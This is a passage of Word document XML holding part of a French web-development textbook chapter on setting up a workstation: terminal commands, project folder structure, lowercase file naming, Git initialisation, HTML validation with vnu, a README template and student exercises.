        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>move</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>del</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>). Windows Subsystem for Linux (WSL) offre un terminal Bash complet et évite les allers-retours d'apprentissage ; nous le recommandons pour la suite du cours.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Créer une arborescence de projet complète en quatre commandes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pwd</w:t>
        <w:br/>
        <w:t>/home/you/mon-site</w:t>
        <w:br/>
        <w:t>$ mkdir -p css js images</w:t>
        <w:br/>
        <w:t>$ touch index.html css/style.css js/app.js</w:t>
        <w:br/>
        <w:t>$ ls -R</w:t>
        <w:br/>
        <w:t>.:</w:t>
        <w:br/>
        <w:t>css  images  index.html  js</w:t>
        <w:br/>
        <w:br/>
        <w:t>./css:</w:t>
        <w:br/>
        <w:t>style.css</w:t>
        <w:br/>
        <w:br/>
        <w:t>./js:</w:t>
        <w:br/>
        <w:t>app.js</w:t>
        <w:br/>
        <w:br/>
        <w:t>./images:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>2.4 Organiser le dossier de travail</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un projet web se reconnaît à son arborescence. La structure proposée au chapitre 1 se précise : les fichiers sources restent à la racine, les ressources sont rangées par nature, et les éléments générés sont isolés.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Arborescence d'un site statique de taille moyenne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mon-site/</w:t>
        <w:br/>
        <w:t>├── index.html</w:t>
        <w:br/>
        <w:t>├── a-propos.html</w:t>
        <w:br/>
        <w:t>├── contact.html</w:t>
        <w:br/>
        <w:t>├── css/</w:t>
        <w:br/>
        <w:t>│   ├── reset.css</w:t>
        <w:br/>
        <w:t>│   └── style.css</w:t>
        <w:br/>
        <w:t>├── js/</w:t>
        <w:br/>
        <w:t>│   └── app.js</w:t>
        <w:br/>
        <w:t>├── images/</w:t>
        <w:br/>
        <w:t>│   ├── logo.svg</w:t>
        <w:br/>
        <w:t>│   └── illustration.webp</w:t>
        <w:br/>
        <w:t>├── fonts/</w:t>
        <w:br/>
        <w:t>│   └── inter-var.woff2</w:t>
        <w:br/>
        <w:t>├── favicon.ico</w:t>
        <w:br/>
        <w:t>└── README.md</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Trois règles rendent cette organisation durable. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un nom, un rôle</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>style.css</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> contient la présentation, jamais le comportement. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Pas d'espaces ni d'accents</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> dans les chemins : les URL doivent rester lisibles et stables. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Tout en minuscules</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> : sur un serveur Linux, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Logo.PNG</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> et </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>logo.png</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> désignent deux fichiers différents, ce qui provoque des erreurs invisibles sur votre machine Windows ou macOS.</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LE PIÈGE DES MAJUSCULES</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Un fichier nommé </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Image.PNG</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> référencé en </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>image.png</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> s'affiche sur macOS (système insensible à la casse par défaut) et renvoie une erreur 404 sur un serveur Linux. C'est l'une des causes les plus fréquentes de « ça marchait chez moi ».</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>2.5 Versionner dès le premier fichier</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Git enregistre l'historique du projet et permet de revenir en arrière. L'installer dès le premier jour évite la tentation des sauvegardes manuelles (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>site-final-v2-vraiment-final.html</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Initialiser un dépôt Git dans un projet web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git init</w:t>
        <w:br/>
        <w:t>$ git config user.name "Votre Nom"</w:t>
        <w:br/>
        <w:t>$ git config user.email "vous@exemple.fr"</w:t>
        <w:br/>
        <w:t>$ printf "node_modules/\n.DS_Store\n*.log\n" &gt; .gitignore</w:t>
        <w:br/>
        <w:t>$ git add .</w:t>
        <w:br/>
        <w:t>$ git commit -m "Structure initiale du projet"</w:t>
        <w:br/>
        <w:t>[main (root-commit) 8f3c2a1] Structure initiale du projet</w:t>
        <w:br/>
        <w:t xml:space="preserve"> 5 files changed, 84 insertions(+)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Le fichier </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>.gitignore</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> liste ce qui ne doit jamais être versionné : dépendances installées, fichiers système, journaux, variables d'environnement. Nous reviendrons en détail sur Git au chapitre 35 ; il suffit ici de prendre l'habitude de commiter à chaque étape terminée.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>2.6 Valider son HTML</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un document valide respecte la grammaire du langage. La validation détecte les balises non fermées, les attributs inconnus, les imbrications interdites et les erreurs d'encodage. Elle ne garantit pas la qualité d'un contenu, mais elle élimine une catégorie entière de bogues.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le service du W3C (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>validator.w3.org</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) accepte une URL, un fichier ou un texte collé. En local, l'extension « W3C Web Validator » ou l'outil en ligne de commande </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>vnu</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> produisent le même diagnostic sans quitter l'éditeur.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Valider un fichier HTML en ligne de commande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npm install --global vnu-jar</w:t>
        <w:br/>
        <w:t>$ vnu --errors-only index.html</w:t>
        <w:br/>
        <w:t>"file:index.html":12.5-12.9: error: Element "h1" not allowed as child of</w:t>
        <w:br/>
        <w:t xml:space="preserve">  element</w:t>
        <w:br/>
        <w:t>"span" in this context.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le message indique le fichier, la ligne, la colonne et la règle violée. Lisez-le littéralement : la cause est presque toujours là où le validateur la situe, et non dans le fichier « coupable » supposé.</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TROIS VÉRIFICATIONS APRÈS CHAQUE PAGE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Valider le document ; corriger toutes les erreurs, examiner les avertissements.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Afficher la page sans CSS : la structure doit rester compréhensible.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Naviguer uniquement au clavier : chaque lien et chaque bouton doit être atteignable.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>2.7 Un environnement reproductible</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Votre poste finira par changer, ou vous travaillerez à deux. Notez la configuration dans un fichier </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>README.md</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> : version de l'éditeur, extensions utilisées, commandes de lancement, conventions de nommage. Ce réflexe, emprunté au monde DevOps, s'appelle la </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>documentation exécutable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> : ce qui n'est pas écrit n'existe pas.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Un README minimal mais suffisant pour reprendre le projet · markdown</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Mon site — notes de développement</w:t>
        <w:br/>
        <w:br/>
        <w:t>## Lancer le projet</w:t>
        <w:br/>
        <w:t xml:space="preserve">    python3 -m http.server 8000</w:t>
        <w:br/>
        <w:t xml:space="preserve">    # puis http://localhost:8000</w:t>
        <w:br/>
        <w:br/>
        <w:t>## Conventions</w:t>
        <w:br/>
        <w:t>- HTML : 2 espaces, attributs sur une ligne si &lt; 100 caractères</w:t>
        <w:br/>
        <w:t>- CSS : classes en kebab-case, pas d'ID pour le style</w:t>
        <w:br/>
        <w:t>- Images : WebP, largeur maximale 1600 px</w:t>
        <w:br/>
        <w:br/>
        <w:t>## Extensions VS Code</w:t>
        <w:br/>
        <w:t>- Live Server, Prettier, W3C Web Validator, axe DevTools</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Ce fichier sera lu par vous-même dans six mois. C'est le meilleur investissement de la première semaine.</w:t>
      </w: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L'éditeur se règle : indentation constante, UTF-8, formatage à l'enregistrement.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outils du navigateur servent à comprendre et expérimenter, pas à corriger.</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Six commandes de terminal suffisent pour organiser un projet web.</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chemins s'écrivent en minuscules, sans espaces ni accents.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Git s'installe dès le premier fichier, pas à la fin du projet.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Valider le HTML supprime une catégorie entière d'erreurs silencieuses.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le poste est prêt et le projet versionné. Le chapitre suivant entre dans le vif du sujet : la structure d'un document HTML, du doctype aux métadonnées.</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2.1 — Configurer son poste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Installez un éditeur, réglez l'indentation à deux espaces, activez le formatage à l'enregistrement et l'encodage UTF-8.</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 xml:space="preserve">Créez un dossier </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>atelier</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> contenant </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>index.html</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> et </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>css/style.css</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Vérifiez que l'enregistrement formate automatiquement le fichier.</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Provoquez volontairement une erreur de validation et corrigez-la.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 2.2 — Enquête dans les outils de développement</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Ouvrez un site de presse, puis inspectez un titre et une image.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Relevez la taille de la police réellement appliquée au titre.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Identifiez la règle CSS responsable et son fichier d'origine.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Modifiez la couleur du titre depuis l'inspecteur, puis rechargez.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 2.3 — Créer une arborescence et la versionner</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 xml:space="preserve">Créez un projet </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>portfolio</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> avec les dossiers </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>css</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>js</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>images</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, un fichier </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>index.html</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, un </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>.gitignore</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> et un dépôt Git.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Respectez la convention de nommage en minuscules.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Ajoutez un premier commit explicite.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Modifiez un fichier, puis vérifiez l'état du dépôt avant de commiter.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 2.4 — Diagnostiquer une page cassée</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On vous transmet ce document. Il s'affiche mal et la validation échoue. Trouvez les trois erreurs, expliquez-les et corrigez-les.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Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>&lt;html&gt;&lt;head&gt;&lt;title&gt;Test&lt;/title&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Bienvenue&lt;h1&gt;&lt;p&gt;Texte &lt;b&gt;important&lt;/p&gt;&lt;/b&gt;&lt;/body&gt;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Indiquez pour chaque erreur la conséquence à l'écran.</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Proposez une version valide et sémantiquement correcte.</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2.1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Le fichier de réglages se trouve dans les préférences de l'éditeur (format JSON). Les options </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>editor.tabSize</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>editor.insertSpaces</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>files.encoding</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> et </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
